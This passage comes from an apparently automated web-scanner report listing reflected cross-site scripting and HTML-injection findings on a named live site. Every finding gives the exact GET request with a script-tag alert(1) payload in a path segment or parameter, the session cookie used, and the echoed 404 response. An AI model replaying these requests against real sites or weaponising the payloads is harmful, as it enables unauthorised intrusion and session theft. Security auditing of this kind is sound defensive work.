<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/search.phpdbc2b<script>alert(1)</script>65a591a3eb5?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1485. http://www.resellerbase.com/detail/18/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/18/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 213b9<a>049b7db85d4 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/18/search.php?keyword=search...&Submit3=Search213b9<a>049b7db85d4&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/worlddatingpartners-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/search.php?keyword=search...&Submit3=Search213b9<a>049b7db85d4&opt=2 was not found on this server.</p>
...[SNIP]...

2.1486. http://www.resellerbase.com/detail/18/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/18/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload c807c<a>0618a88d04a was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/18/search.php?keyword=search...c807c<a>0618a88d04a&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/worlddatingpartners-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/search.php?keyword=search...c807c<a>0618a88d04a&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1487. http://www.resellerbase.com/detail/18/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/18/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 6da70<script>alert(1)</script>b5622afee88 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18/search.php?keyword=search...&Submit3=Search&opt=2&6da70<script>alert(1)</script>b5622afee88=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/worlddatingpartners-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/search.php?keyword=search...&Submit3=Search&opt=2&6da70<script>alert(1)</script>b5622afee88=1 was not found on this server.</p>
...[SNIP]...

2.1488. http://www.resellerbase.com/detail/18/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/18/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload ec7b2<a>b59bb3b5bf1 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/18/search.php?keyword=search...&Submit3=Search&opt=2ec7b2<a>b59bb3b5bf1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/worlddatingpartners-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/search.php?keyword=search...&Submit3=Search&opt=2ec7b2<a>b59bb3b5bf1 was not found on this server.</p>
...[SNIP]...

2.1489. http://www.resellerbase.com/detail/18/themes/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/18/themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 92290<script>alert(1)</script>49e6c1a1682 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail92290<script>alert(1)</script>49e6c1a1682/18/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail92290<script>alert(1)</script>49e6c1a1682/18/themes/ was not found on this server.</p>
...[SNIP]...

2.1490. http://www.resellerbase.com/detail/18/themes/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/18/themes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 92787<script>alert(1)</script>c89ee821ea0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/1892787<script>alert(1)</script>c89ee821ea0/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/1892787<script>alert(1)</script>c89ee821ea0/themes/ was not found on this server.</p>
...[SNIP]...

2.1491. http://www.resellerbase.com/detail/18/themes/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/18/themes/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d3c98<script>alert(1)</script>b5ae50dcd4a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18/themesd3c98<script>alert(1)</script>b5ae50dcd4a/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themesd3c98<script>alert(1)</script>b5ae50dcd4a/ was not found on this server.</p>
...[SNIP]...

2.1492. http://www.resellerbase.com/detail/18/themes/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/18/themes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 2aa65<script>alert(1)</script>a9e91817d38 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18/themes/?2aa65<script>alert(1)</script>a9e91817d38=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themes/?2aa65<script>alert(1)</script>a9e91817d38=1 was not found on this server.</p>
...[SNIP]...

2.1493. http://www.resellerbase.com/detail/18/themes/kosmos/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/18/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4bf6d<script>alert(1)</script>e3f47e89fb0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail4bf6d<script>alert(1)</script>e3f47e89fb0/18/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail4bf6d<script>alert(1)</script>e3f47e89fb0/18/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.1494. http://www.resellerbase.com/detail/18/themes/kosmos/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/18/themes/kosmos/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a48cd<script>alert(1)</script>a1d87a5f690 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18a48cd<script>alert(1)</script>a1d87a5f690/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18a48cd<script>alert(1)</script>a1d87a5f690/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.1495. http://www.resellerbase.com/detail/18/themes/kosmos/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/18/themes/kosmos/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload dd705<script>alert(1)</script>ed002553f0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18/themesdd705<script>alert(1)</script>ed002553f0/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themesdd705<script>alert(1)</script>ed002553f0/kosmos/ was not found on this server.</p>
...[SNIP]...

2.1496. http://www.resellerbase.com/detail/18/themes/kosmos/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/18/themes/kosmos/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload fe1cc<script>alert(1)</script>fc5bb89d2de was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18/themes/kosmosfe1cc<script>alert(1)</script>fc5bb89d2de/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themes/kosmosfe1cc<script>alert(1)</script>fc5bb89d2de/ was not found on this server.</p>
...[SNIP]...

2.1497. http://www.resellerbase.com/detail/18/themes/kosmos/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/18/themes/kosmos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 46359<script>alert(1)</script>4eb4e624261 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18/themes/kosmos/?46359<script>alert(1)</script>4eb4e624261=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themes/kosmos/?46359<script>alert(1)</script>4eb4e624261=1 was not found on this server.</p>
...[SNIP]...

2.1498. http://www.resellerbase.com/detail/18/themes/kosmos/images/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/18/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f8b8d<script>alert(1)</script>f5af6ff28b6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailf8b8d<script>alert(1)</script>f5af6ff28b6/18/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailf8b8d<script>alert(1)</script>f5af6ff28b6/18/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.1499. http://www.resellerbase.com/detail/18/themes/kosmos/images/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/18/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3871f<script>alert(1)</script>2b8d9355873 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/183871f<script>alert(1)</script>2b8d9355873/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/183871f<script>alert(1)</script>2b8d9355873/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.1500. http://www.resellerbase.com/detail/18/themes/kosmos/images/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/18/themes/kosmos/images/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 53335<script>alert(1)</script>1d01ce684d8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18/themes53335<script>alert(1)</script>1d01ce684d8/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themes53335<script>alert(1)</script>1d01ce684d8/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.1501. http://www.resellerbase.com/detail/18/themes/kosmos/images/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/18/themes/kosmos/images/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d5c17<script>alert(1)</script>f59b4112ee9 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18/themes/kosmosd5c17<script>alert(1)</script>f59b4112ee9/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themes/kosmosd5c17<script>alert(1)</script>f59b4112ee9/images/ was not found on this server.</p>
...[SNIP]...

2.1502. http://www.resellerbase.com/detail/18/themes/kosmos/images/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/18/themes/kosmos/images/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 56622<script>alert(1)</script>a3d818fb5bd was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18/themes/kosmos/images56622<script>alert(1)</script>a3d818fb5bd/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themes/kosmos/images56622<script>alert(1)</script>a3d818fb5bd/ was not found on this server.</p>
...[SNIP]...

2.1503. http://www.resellerbase.com/detail/18/themes/kosmos/images/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/18/themes/kosmos/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload f37db<script>alert(1)</script>daade4a7e1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18/themes/kosmos/images/?f37db<script>alert(1)</script>daade4a7e1=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themes/kosmos/images/?f37db<script>alert(1)</script>daade4a7e1=1 was not found on this server.</p>
...[SNIP]...

2.1504. http://www.resellerbase.com/detail/18/themes/kosmos/images/rating/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/18/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d6d4d<script>alert(1)</script>90ac14b037d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaild6d4d<script>alert(1)</script>90ac14b037d/18/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
